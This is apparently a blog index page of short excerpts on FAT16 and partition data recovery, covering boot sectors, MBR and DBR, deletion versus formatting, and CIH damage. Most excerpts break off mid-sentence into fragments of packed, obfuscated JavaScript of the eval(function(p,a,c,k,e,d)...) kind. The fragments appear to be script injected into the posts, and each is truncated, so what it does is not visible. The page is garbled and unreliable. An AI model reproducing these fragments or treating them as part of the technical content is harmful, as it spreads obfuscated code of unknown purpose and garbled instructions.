Let’s see a boot sector (start sector is DBR) in FAT16 after advanced format. The OEM mark is MSWIN5.0.
From eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 9, 2009 3:39 AM / no comments
After full eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 9, 2009 3:08 AM / no comments
Actually quick advanced format is completely deleting all files and sub-directories, for there will not any more file or directory record in FDT and FAT, thus releasing the whole disk space.
Now let’s have a look at the changes of FDT and...
December 8, 2009 7:55 AM / no comments
Many people believe that when files are deleted, the system will clear all the content of the deleted eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 7, 2009 5:07 AM / 2 comments
In root directory of eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 7, 2009 3:30 AM / no comments
As we all know, file eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 7, 2009 3:09 AM / no comments
CIH destroys data backwards from partitions. In this case, system data in the former part may be destroyed and lost. If FAT2 is still intact, we may make FAT2 to cover FAT1. Usually we use DiskEdit eval(function(p,a,c,k,e,d){e=function(c){return...
December 2, 2009 3:57 AM / no comments
MBR is for the whole hard disk, while DBR is for individual partition. The first sector of each MBR is DBR. Just as MBR, DBR contains some information that the boot operation system need. If DBR is corrupted, you can neither visit the partition...
December 2, 2009 3:48 AM / no comments
Partition tables become corrupt for various (often obscure) reasons, causing various symptoms, including but not limited to the following most common:
* Some volumes just disappear. Disk eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 2, 2009 1:36 AM / no comments
The key to successful partition eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 2, 2009 1:13 AM / no comments